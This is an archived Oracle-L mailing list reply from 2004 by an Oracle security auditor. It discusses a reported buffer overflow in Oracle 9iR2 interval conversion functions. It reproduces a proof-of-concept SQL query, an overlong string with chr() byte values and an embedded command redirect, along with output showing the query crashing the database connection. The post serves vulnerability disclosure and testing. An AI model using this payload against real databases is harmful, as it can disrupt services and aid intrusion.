| Oracle FAQ | Your Portal to the Oracle Knowledge Grid | |
 |
 | |||
| Oracle FAQ | Your Portal to the Oracle Knowledge Grid | |
|
| |||
Home -> Community -> Mailing Lists -> Oracle-L -> Re: [NEWS] Oracle Database 9ir2 Interval Conversion Buffer Overflow
Hi Jared,
I heard about this issue in early Feb. This guy Cesar Cerrudo posted a message to vulnwatch about these two vulnerabilities and also said he had a lot more. I saw a post on Bugtraq yesterday where someone was asking for the patch info. It is not clear if an Oracle fix matches this bug or not and which patch applies. There is no advisory.
Here is the header info from vulnwatch from his post. I have the full email sent to vulnwatch which is similar to Jared's version on securiteam but is longer (no extra technical details mostly rants)
<quote>
From: Cesar [mailto:cesarc56_at_yahoo.com]
Sent: Thu 2004-02-05 3:15 PM
To: vulnwatch_at_vulnwatch.org Cc: Subject: [VulnWatch] Oracle Database 9ir2 Interval ConversionFunctions Buffer Overflow
Name: Oracle Database 9ir2 Interval Conversion
Functions Buffer Overflow.
System Affected : Oracle Database 9ir2, previous
versions could be affected too.
Severity : High
Remote exploitable : Yes
Author: Cesar Cerrudo.
Date: 02/05/04
Advisory Number: CC020401
</quote>
Anyway I have run the following test based on what he said in his advisory:
SQL> edit
Wrote file afiedt.buf
1 SELECT NUMTOYMINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJK
LMNOPQR'
2 || chr(59)||chr(79)||chr(150)||chr(01)||chr(141)||chr(68)||chr(36)|
|chr(18)||chr(80)||chr(255)|
3 ||chr(52)||chr(35)||chr(148)||chr(01)||chr(255)||chr(37)||chr(172)|
|chr(33)||chr(148)||chr(01)|
4* ARE YOU SURE? >c:\Unbreakable.txt') FROM DUAL
SQL> /
ARE YOU SURE? >c:\Unbreakable.txt') FROM DUAL
*
ERROR at line 4:
SQL> select sysdate from dual;
select sysdate from dual
*
ERROR at line 1:
ORA-03114: not connected to ORACLE
SQL>
SQL> connect system/manager_at_sans
Connected.
SQL> edit
Wrote file afiedt.buf
1 SELECT NUMTODSINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJK
LMNOPQR'
2 || chr(59)||chr(79)||chr(150)||chr(01)||chr(141)||chr(68)||chr(36)|
|chr(18)||chr(80)||chr(255)|
3 ||chr(52)||chr(35)||chr(148)||chr(01)||chr(255)||chr(37)||chr(172)|
|chr(33)||chr(148)||chr(01)|
4* ARE YOU SURE? >c:\Unbreakable.txt') FROM DUAL
SQL> /
SELECT NUMTODSINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOP
QR'
*
ERROR at line 1:
ORA-03113: end-of-file on communication channel
SQL> select sysdate from dual;
select sysdate from dual
*
ERROR at line 1:
ORA-03114: not connected to ORACLE
SQL> So yes both of these vulnerabilities will terminate the Oracle connection so its possible it could be exploited remotely. The file > c:\Unbreakable.txt is not created though. I have not tried under a debugger to see if anything can be done with the 3113 error in terms of exploiting the stack. If this is a true buffer overflow exploit then he would need to pass some sort of shell code and manipulate the stack to run it. Maybe his chr(??) are some sort of shell code for it to be a buffer overflow and capture the machine. On the surface it doesn't seem to work though.
SQL*net trace didn't tell me much and also an Oracle core is created in the cdump directory with the are you sure text on the top of the stack. I ran this on XP 9ir2 personal edition.
Kind regards
Pete
-- Pete Finnigan email:pete_at_petefinnigan.com Web site: http://www.petefinnigan.com - Oracle security audit specialists Book:Oracle security step-by-step Guide - see http://store.sans.org for details. ---------------------------------------------------------------- Please see the official ORACLE-L FAQ: http://www.orafaq.com ---------------------------------------------------------------- To unsubscribe send email to: oracle-l-request_at_freelists.org put 'unsubscribe' in the subject line. -- Archives are at http://www.freelists.org/archives/oracle-l/ FAQ is at http://www.freelists.org/help/fom-serve/cache/1.html -----------------------------------------------------------------Received on Thu Feb 26 2004 - 14:42:10 CST
 |
 |